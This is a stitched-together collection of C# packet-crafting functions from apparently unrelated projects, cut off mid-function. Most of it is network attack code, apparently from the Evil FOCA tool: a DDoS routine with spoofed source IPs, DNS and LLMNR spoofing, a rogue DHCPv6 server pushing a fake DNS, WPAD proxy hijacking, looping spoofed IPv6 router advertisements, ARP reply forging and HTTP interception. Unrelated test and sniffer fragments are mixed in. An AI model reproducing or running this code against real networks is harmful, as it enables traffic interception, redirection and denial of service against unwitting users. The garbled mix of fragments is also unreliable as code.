public override object[] Attack(string[] DDoSWork) { object[] obj = new object[2]; string sDestinationAddress = DDoSWork[0]; ushort tcpSourcePort = ushort.Parse(GetOpenPort()); ushort tcpDestinationPort = 53; TcpPacket tcpPacket = new TcpPacket(tcpSourcePort, tcpDestinationPort); IPAddress ipSourceAddress = System.Net.IPAddress.Parse(GetRandomIP()); IPAddress ipDestinationAddress = System.Net.IPAddress.Parse(sDestinationAddress); IPv4Packet ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress); string sourceHwAddress = "90-90-90-90-90-90"; var ethernetSourceHwAddress = System.Net.NetworkInformation.PhysicalAddress.Parse(sourceHwAddress); string destionationHwAddress = "80-80-80-80-80-80"; var ethernetDestinationHwAdress = System.Net.NetworkInformation.PhysicalAddress.Parse(destionationHwAddress); var ethernetPacket = new EthernetPacket(ethernetSourceHwAddress, ethernetDestinationHwAdress, EthernetPacketType.None); ipPacket.PayloadPacket = tcpPacket; ethernetPacket.PayloadPacket = ipPacket; byte[] bPacket = new byte[75]; var devices = CaptureDeviceList.Instance; int i = 0; var device = null; return obj; }
public int sendPacket() { byte[] bytes = new byte[4096]; ByteArraySegment bas = new ByteArraySegment(bytes); ushort srcPort = 23444; ushort dstPort = 12345; PacketDotNet.UdpPacket udpPacket = new UdpPacket(srcPort, dstPort); string cmdString = "xxxxyyyyHello world!"; byte[] sendBuffer = Encoding.ASCII.GetBytes(cmdString); udpPacket.PayloadData = sendBuffer; ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(sendBuffer)); // sanity check: //bas.BytesLength = 10; //Console.WriteLine("bas - Offset = " + bas.Offset + " len= " + bas.Length); IPAddress ipSrcAddr = System.Net.IPAddress.Parse("192.168.0.186"); // laptop IPAddress ipDestAddr = System.Net.IPAddress.Parse("192.168.0.185"); // my linux box IpPacket ipPacket = new IPv4Packet(ipSrcAddr, ipDestAddr); ipPacket.PayloadPacket = udpPacket; icmpPacket.TypeCode = ICMPv4TypeCodes.Unassigned1; icmpPacket.Sequence = 1; Console.WriteLine("icmpPacket - TypeCode = " + icmpPacket.TypeCode + " Sequence= " + icmpPacket.Sequence); Console.WriteLine("icmpPacket : " + icmpPacket.PrintHex()); icmpPacket.UpdateCalculatedValues(); Console.WriteLine("icmpPacket : " + icmpPacket.PrintHex()); //ushort etype = 0xFF00; //EthernetPacketType RAW ? System.Net.NetworkInformation.PhysicalAddress ethSrcAddr = System.Net.NetworkInformation.PhysicalAddress.Parse("02-1E-EC-8F-7F-E1"); System.Net.NetworkInformation.PhysicalAddress ethDstAddr = System.Net.NetworkInformation.PhysicalAddress.Parse("48-5B-39-ED-96-36"); EthernetPacket ethernetPacket = new EthernetPacket(ethSrcAddr, ethDstAddr, EthernetPacketType.IpV4); // I thought "None" for type would fill in type automatically; but it remained zero on the wire and was flagged "Malformed" ethernetPacket.PayloadPacket = icmpPacket; Console.WriteLine("ethernetPacket : " + ethernetPacket.PrintHex()); ethernetPacket.Type = EthernetPacketType.IpV4; Console.WriteLine("ethernetPacket : " + ethernetPacket.PrintHex()); //ipPacket.PayloadPacket = udpPacket; //ethernetPacket.PayloadPacket = gmpPacket; //ipPacket; ethernetPacket.UpdateCalculatedValues(); Console.WriteLine(ethernetPacket.ToString()); ipPacket.UpdateCalculatedValues(); //udpPacket.UpdateUDPChecksum(); // Experiment with raw ip packet? ipPacket.Protocol = IPProtocolType.RAW; // Why isn't ValidChecksum true? //Console.WriteLine("After updating calculated values, ValidUDPChecksum = " + udpPacket.ValidUDPChecksum + " ValidChecksum = " + udpPacket.ValidChecksum); //Console.WriteLine(ethernetPacket.ToString()); device.Open(DeviceMode.Normal, 15000); // 15 sec timeout //ushort checksum = csum(ipPacket.BytesHighPerformance, ipPacket.P); device.SendPacket(ethernetPacket); return 0; }
private void DNSCheck(Packet p) { EthernetPacket ethernet = (EthernetPacket)p; if (p.PayloadPacket.PayloadPacket is UdpPacket) { UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket; attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack => { MitmAttack mitmAttack = currentAttack as MitmAttack; if (p.PayloadPacket is IPv6Packet) { switch (udp.DestinationPort) { case 53: Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); var aaaaDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A select q).ToList(); //Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A. var aTeredoDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.A && (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi")) select q).ToList(); if (aaaaDns != null && aaaaDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } else if (aTeredoDns != null && aTeredoDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; case 5355: LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(udp.PayloadData); if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA) { IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name) where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork select ip).ToArray(); byte[] ipv6Addr = new byte[] { 0x00,0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0xff,0xff, (byte)ips[0].GetAddressBytes()[0],(byte)ips[0].GetAddressBytes()[1], (byte)ips[0].GetAddressBytes()[2] ,(byte)ips[0].GetAddressBytes()[3] }; llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.AAAA, RData = ipv6Addr, RDLength = (short)ipv6Addr.Length }); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; default: break; } } }); } }
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p) { if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket)) return; UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if (udp.ParentPacket == null) return; if (!(udp.ParentPacket is IPv6Packet)) return; if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0) return; DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First(); IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket; EthernetPacket ethernet = (EthernetPacket)p; /* Info: http://en.wikipedia.org/wiki/DHCPv6 Example In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64. DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546. DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.) DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546. */ DHCPv6Packet pa = new DHCPv6Packet(); pa.ParsePacket(udp.PayloadData); if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2"))) { EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV6); UdpPacket newUDP = null; IPAddress ipv6LocalLink = null; IPv6Packet newIpv6 = null; switch (pa.MessageType) { case DHCPv6Type.Solicit: if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA)) { newUDP = new UdpPacket(547, 546); byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value; pa.MessageType = DHCPv6Type.Advertise; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.IANA); pa.AddServerIdentifierOption(device.MacAddress); pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); IpID++; newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); } break; case DHCPv6Type.Request: newUDP = new UdpPacket(547, 546); pa.MessageType = DHCPv6Type.Reply; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.DNS); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); break; case DHCPv6Type.InformationRequest: newUDP = new UdpPacket(547, 546); pa.MessageType = DHCPv6Type.Reply; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.IANA); pa.AddServerIdentifierOption(device.MacAddress); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); break; default: break; } } }
public void SendWpadFile(Packet packet) { lock (locker) { if (packet is EthernetPacket) { EthernetPacket ethPacket = packet as EthernetPacket; IPv6Packet ipv6Source = (IPv6Packet)packet.PayloadPacket; if (ipv6Source.PayloadPacket is PacketDotNet.TcpPacket) { TcpPacket tcp = ipv6Source.PayloadPacket as TcpPacket; string element = string.Format("{0}/{1}", tcp.SequenceNumber, tcp.AcknowledgmentNumber); ushort destPort = tcp.SourcePort; ushort sourcePort = tcp.DestinationPort; IPAddress destAddress = ipv6Source.SourceAddress; IPAddress sourceAddress = ipv6Source.DestinationAddress; PhysicalAddress sourceMac = Program.CurrentProject.data.GetDevice().MacAddress; PhysicalAddress destMac = ethPacket.SourceHwAddress; tcp.SourcePort = sourcePort; tcp.DestinationPort = destPort; if (tcp.Syn && !tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0 && sourcePort == 80) { tcp.Ack = true; tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1; tcp.SequenceNumber = tcp.SequenceNumber + 38; tcp.WindowSize = 14600; IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } else if (!tcp.Syn && tcp.Ack && tcp.PayloadData != null && !tcp.Rst && tcp.PayloadData.Length > 0 && sourcePort == 80) { if (Data.Data.WpadReqList.Contains(element)) return; Data.Data.WpadReqList.Add(element); HttpPacket http = new HttpPacket(((TcpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData); if (http.FullUrlRequest.Contains("wpad.dat")) { tcp.Psh = true; tcp.Fin = true; tcp.Ack = true; tcp.SequenceNumber = (ipv6Source.PayloadPacket as TcpPacket).AcknowledgmentNumber; tcp.AcknowledgmentNumber = tcp.SequenceNumber; string jsFunction = string.Format("function FindProxyForURL(url, host){{return \"PROXY [{0}]:{1}\";}}", ipv6Source.DestinationAddress.ToString(), proxyPort); string htmlHeader = string.Format("HTTP/1.1 200 OK\r\nContent-Type: application/x-ns-proxy-autoconfig\r\nContent-Length: {0}\r\n\r\n", jsFunction.Length); tcp.PayloadData = System.Text.Encoding.UTF8.GetBytes(string.Concat(htmlHeader, jsFunction)); EthernetPacket eth = new EthernetPacket(ethPacket.DestinationHwAddress, ethPacket.SourceHwAddress, EthernetPacketType.IpV6); IPv6Packet ip6 = new IPv6Packet(ipv6Source.DestinationAddress, ipv6Source.SourceAddress); ip6.PayloadPacket = tcp; eth.PayloadPacket = ip6; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } } else if (tcp.Fin && tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0) { tcp.Ack = true; tcp.Fin = false; uint ackOrg = tcp.AcknowledgmentNumber; tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1; tcp.SequenceNumber = ackOrg; tcp.WindowSize = 1400; IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } } } } }
// create ARP reply packet (sender IP, target IP, target MAC, specific source MAC) private EthernetPacket GenerateARPReply(string senderIP, string targetIP, PhysicalAddress targetMAC, PhysicalAddress sourceMAC) { var ethernetPacket = new EthernetPacket(physicalAddress, targetMAC, EthernetPacketType.Arp); var arpPacket = new ARPPacket(ARPOperation.Response, targetMAC, IPAddress.Parse(targetIP), sourceMAC, IPAddress.Parse(senderIP)); ethernetPacket.PayloadPacket = arpPacket; return ethernetPacket; }
// create multicast IPv6 ping packet private EthernetPacket GenerateIpv6Ping() { var ethernetPacket = new EthernetPacket(physicalAddress, broadcastMAC, EthernetPacketType.Arp); var ipv6Packet = new IPv6Packet(IPAddress.Parse((deviceInfo.IPv6 != string.Empty ? deviceInfo.IPv6 : deviceInfo.LinkLocal)), IPAddress.Parse("ff02::1")); ipv6Packet.NextHeader = IPProtocolType.ICMPV6; ethernetPacket.PayloadPacket = ipv6Packet; var icmpv6Packet = new ICMPv6Packet(new ByteArraySegment(new byte[40])) { Type = ICMPv6Types.EchoRequest, PayloadData = Encoding.ASCII.GetBytes("abcdefghijklmnopqrstuvwabcdefghi") }; ipv6Packet.PayloadPacket = icmpv6Packet; // ICMPv6 checksum fix var pseudo = Network.GetPseudoHeader(ipv6Packet.SourceAddress, ipv6Packet.DestinationAddress, icmpv6Packet.Bytes.Length, 58); icmpv6Packet.Checksum = (ushort)(ChecksumUtils.OnesComplementSum(pseudo.Concat(icmpv6Packet.Bytes).ToArray()) + 4); return ethernetPacket; }
private void SendHttpResponse(HttpPacket httpReq, EthernetPacket orgEthPacket, ushort sourcePort, ushort destinationPort, uint ackNumber, uint expectedSeqNumber) { IPv6Packet ipv6 = (IPv6Packet)orgEthPacket.PayloadPacket; TcpPacket tcp = new TcpPacket(sourcePort, destinationPort); IPAddress destAddress = ipv6.SourceAddress; IPAddress sourceAddress = ipv6.DestinationAddress; PhysicalAddress sourceMac = device.MacAddress; PhysicalAddress destMac = orgEthPacket.SourceHwAddress; string urlRequest = string.IsNullOrEmpty(httpReq.Host) ? string.Format("http://{0}{1}", Ipv6To4Addr(ipv6.DestinationAddress.ToString()), httpReq.ResourceRequest) : httpReq.FullUrlRequest; bool validRequest = false; HttpWebRequest req = null; HttpWebResponse response = null; IPv6Packet ipv6Ack = null; EthernetPacket eth = null; CookieContainer lastCookies = httpReq.Cookies; string userAgent = httpReq.UserAgent; int repeatRedirect = 0; //Fix no Google's javascript redirect if (httpReq.Host.Contains("google") && httpReq.FullUrlRequest.Contains("/xjs/_/js/")) validRequest = true; while (!validRequest) { req = HttpWebRequest.Create(urlRequest) as HttpWebRequest; req.Host = req.Address.Host; req.UserAgent = userAgent; req.Method = httpReq.Method; //req.Accept = httpReq.Accept; req.Headers[HttpRequestHeader.AcceptLanguage] = httpReq.AcceptLanguage; req.Referer = httpReq.Referer; req.AllowAutoRedirect = false; if (lastCookies == null) lastCookies = new CookieContainer(); req.CookieContainer = lastCookies; if (httpReq.Method.ToLower() == "post" && httpReq.Data != null) { req.ContentType = httpReq.ContentType; req.ContentLength = httpReq.Data.Length; using (Stream dataStream = req.GetRequestStream()) { using (BinaryWriter writer = new BinaryWriter(dataStream)) { writer.Write(httpReq.Data); } } } try { response = req.GetResponse() as HttpWebResponse; if ((response.StatusCode == HttpStatusCode.Found || response.StatusCode == HttpStatusCode.Moved) && response.Headers[HttpResponseHeader.Location].StartsWith("https")) throw new WebException("302", null, WebExceptionStatus.UnknownError, response); else validRequest = true; } catch (WebException ex404) { if (ex404.Message.Contains("404") && ex404.Response != null) { if ((ex404.Response as HttpWebResponse) != null) response = (ex404.Response as HttpWebResponse); validRequest = true; } else if (ex404.Message.Contains("403") && ex404.Response.ResponseUri.AbsoluteUri.StartsWith("http:")) { validRequest = false; urlRequest = string.Format("https{0}", ex404.Response.ResponseUri.AbsoluteUri.Substring(4)); if (!string.IsNullOrEmpty(ex404.Response.Headers[HttpResponseHeader.SetCookie])) { CookieCollection col = HttpPacket.ParseSetCookies(ex404.Response.Headers[HttpResponseHeader.SetCookie]); if (col.Count > 0) { if (!string.IsNullOrEmpty(col[0].Domain)) { string domain = col[0].Domain; if (domain.StartsWith(".")) domain = domain.Remove(0, 1); lastCookies.Add(new Uri(string.Format("http://{0}", domain)), col); } else lastCookies.Add(ex404.Response.ResponseUri, col); } } } else if (ex404.Message.Contains("302")) { if (repeatRedirect < REDIRECTCOUNT) { validRequest = false; urlRequest = ex404.Response.Headers[HttpResponseHeader.Location]; if (!string.IsNullOrEmpty(ex404.Response.Headers[HttpResponseHeader.SetCookie])) { CookieCollection col = HttpPacket.ParseSetCookies(ex404.Response.Headers[HttpResponseHeader.SetCookie]); if (col.Count > 0) { if (!string.IsNullOrEmpty(col[0].Domain)) { string domain = col[0].Domain; if (domain.StartsWith(".")) domain = domain.Remove(0, 1); if (urlRequest.StartsWith("https")) lastCookies.Add(new Uri(string.Format("https://{0}", domain)), col); else lastCookies.Add(new Uri(string.Format("http://{0}", domain)), col); } else lastCookies.Add(ex404.Response.ResponseUri, col); } } repeatRedirect++; } else { validRequest = true; response = null; } } else { validRequest = true; } } catch (Exception) { } } int previousLength = 0; uint ackValue = expectedSeqNumber; uint sequence = ackNumber; if (response != null) { try { foreach (var item in response.GetBytes(1300)) { tcp.Psh = false; tcp.Fin = false; tcp.Ack = true; tcp.AcknowledgmentNumber = ackValue; tcp.SequenceNumber = sequence + (uint)previousLength; sequence = tcp.SequenceNumber; previousLength = item.Length; tcp.WindowSize = 1600; tcp.PayloadData = item; ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } } catch (Exception e) { e.ToString(); } tcp.Psh = true; tcp.Fin = true; tcp.Ack = true; tcp.AcknowledgmentNumber = ackValue; tcp.SequenceNumber = sequence + (uint)previousLength; tcp.WindowSize = 1600; tcp.PayloadData = new byte[0]; ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } else { tcp.Psh = true; tcp.Fin = true; tcp.Ack = true; tcp.AcknowledgmentNumber = ackValue; tcp.SequenceNumber = sequence + (uint)previousLength; tcp.WindowSize = 1600; tcp.PayloadData = HttpPacket.Get404Packet(); ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } }
private void Attack() { while (true) { try { /* INICIAR EL ATAQUE MODIFICANDO LA CACHE ARP (DoS IPv4) Y LAS TABLAS DE VECINOS (IPv6 SLAAC) */ foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.SlaacMitm && A.attackStatus == Data.AttackStatus.Attacking)) { if (attack is evilfoca.Data.MitmAttack) { evilfoca.Data.MitmAttack slaacMitm = (evilfoca.Data.MitmAttack)attack; EthernetPacket ethernet; { IPAddress myIP = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(Program.CurrentProject.data.GetDevice()); PhysicalAddress myMac = Program.CurrentProject.data.GetDevice().MacAddress; // IPv6 (de vinculo local) y MAC atacada IPAddress IPdst = slaacMitm.t2.ip; PhysicalAddress MACdst = slaacMitm.t2.mac; ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(myMac, slaacMitm.prefix, false).GetBytes())); IPv6Packet ipv6 = new IPv6Packet(myIP, IPdst); ipv6.PayloadPacket = routerAdvertisement; ipv6.HopLimit = 255; ethernet = new EthernetPacket(myMac, MACdst, EthernetPacketType.IpV6); ethernet.PayloadPacket = ipv6; Program.CurrentProject.data.SendPacket(ethernet); } } } /* PARAR ATAQUE Y RESTAURAR LA CACHE DNS Y TABLAS DE VECINOS */ foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.SlaacMitm && A.attackStatus == Data.AttackStatus.Stopping)) { if (attack is evilfoca.Data.MitmAttack) { evilfoca.Data.MitmAttack slaacMitm = (evilfoca.Data.MitmAttack)attack; /* Enviar paquetes para que pare la denegacion de servicio IPv4 */ /* Enviar paquetes para que pare el envenenamiento de vecino IPv6 */ attack.attackStatus = Data.AttackStatus.Stop; } } Thread.Sleep(SendPacketEachXSecs * 1000); } catch { } } }
public void EthernetConstructorFromMacAddresses() { var srcHwAddressBytes = new Byte[EthernetFields.MacAddressLength]; for(int i = 0; i < srcHwAddressBytes.Length; i++) { srcHwAddressBytes[i] = (byte)i; } var dstHwAddressBytes = new Byte[EthernetFields.MacAddressLength]; for(int i = 0; i < dstHwAddressBytes.Length; i++) { dstHwAddressBytes[i] = (byte)(dstHwAddressBytes.Length - i); } var srcHwAddress = new PhysicalAddress(srcHwAddressBytes); var dstHwAddress = new PhysicalAddress(dstHwAddressBytes); var ethernetPacket = new EthernetPacket(srcHwAddress, dstHwAddress, EthernetPacketType.None); int expectedLength = 14; Assert.AreEqual(expectedLength, ethernetPacket.Bytes.Length); //TODO: improve this here Console.WriteLine("ethernetPacket.ToString() {0}", ethernetPacket.ToString()); }
private void _CheckIfNeighborRoutesPackets(Neighbor n) { if (n == null) return; IPAddress IpSrc = Program.CurrentProject.data.GetIPv4FromDevice(device); if (IpSrc == null) return; n.canRoutePackets = RouteStatus.Verifing; EthernetPacket eth = new EthernetPacket(Program.CurrentProject.data.GetDevice().MacAddress, n.physicalAddress, EthernetPacketType.IpV4); IPAddress IpDst = IPAddress.Parse("8.8.8.8"); eth.PayloadPacket = new IPv4Packet(IpSrc, IpDst); eth.PayloadPacket.PayloadPacket = new TcpPacket((ushort)31337, (ushort)53); ((IPv4Packet)eth.PayloadPacket).UpdateIPChecksum(); ((TcpPacket)eth.PayloadPacket.PayloadPacket).Syn = true; ((TcpPacket)eth.PayloadPacket.PayloadPacket).UpdateTCPChecksum(); Thread t = new Thread(new ParameterizedThreadStart(CheckIfRouted)); t.IsBackground = true; t.Start(n); Program.CurrentProject.data.SendPacket(eth); }
public packet(RawCapture pac) { temp = Packet.ParsePacket(pac.LinkLayerType, pac.Data); rawp = pac; DateTime time = pac.Timeval.Date; this.time = time.Date.ToString().Split()[0] + " " + time.Hour.ToString() + ":" + time.Minute.ToString() + ":" + time.Second.ToString() + ":" + time.Millisecond.ToString(); this.destination = ""; this.color = ""; this.srcPort = ""; this.desPort = ""; this.source = ""; this.protocol = ""; this.information = ""; this.data = ""; this.layer = pac.LinkLayerType; this.paclen = temp.Bytes.Length; PacketInforArray.Add("Total Length : " + this.paclen.ToString() + "Bytes"); KeyWords.Add(this.paclen.ToString()); if (this.layer == PacketDotNet.LinkLayers.Ethernet) { // //以太网层 // epac = (PacketDotNet.EthernetPacket)temp; EthernetInforArray.Add("Ethernet II \n"); // EthernetInforArray.Add("Destination Hardware Address: " + epac.DestinationHwAddress.ToString() + "\n"); EthernetInforArray.Add("Destination Hardware Address: " + genHardwareAddr(epac.DestinationHwAddress.ToString()) + "\n"); // EthernetInforArray.Add("Source Hardware Address: " + epac.SourceHwAddress.ToString() + "\n"); EthernetInforArray.Add("Source Hardware Address: " + genHardwareAddr(epac.SourceHwAddress.ToString()) + "\n"); EthernetInforArray.Add("Type of the ethernet: " + epac.Type.ToString() + "\n"); KeyWords.Add("Ethernet".ToUpper()); KeyWords.Add(genHardwareAddr(epac.DestinationHwAddress.ToString().ToUpper())); KeyWords.Add(genHardwareAddr(epac.SourceHwAddress.ToString().ToUpper())); KeyWords.Add(epac.Type.ToString().ToUpper()); Network_type = epac.Type.ToString().ToUpper(); // //ip层 // if (epac.Type.ToString() == "IpV4" || epac.Type.ToString() == "IpV6") { //ipv4 if (epac.Type.ToString() == "IpV4") { //record keywords ip4 = (IPv4Packet)epac.Extract(typeof(IPv4Packet)); this.protocol = ip4.Protocol.ToString(); this.destination = ip4.DestinationAddress.ToString(); this.source = ip4.SourceAddress.ToString(); this.information = ip4.TotalLength.ToString() + "Bytes | id :" + ip4.Id.ToString() + " |"; //Internet protocl messages IpInforArray.Add("HeaderLength : " + (ip4.HeaderLength * 4).ToString() + "Bytes \n"); IpInforArray.Add("Version: " + ip4.Version.ToString() + "\n"); IpInforArray.Add("Type of Service: " + ip4.TypeOfService.ToString() + "\n"); IpInforArray.Add("Total Length: " + ip4.Bytes.Length.ToString() + "Bytes \n"); 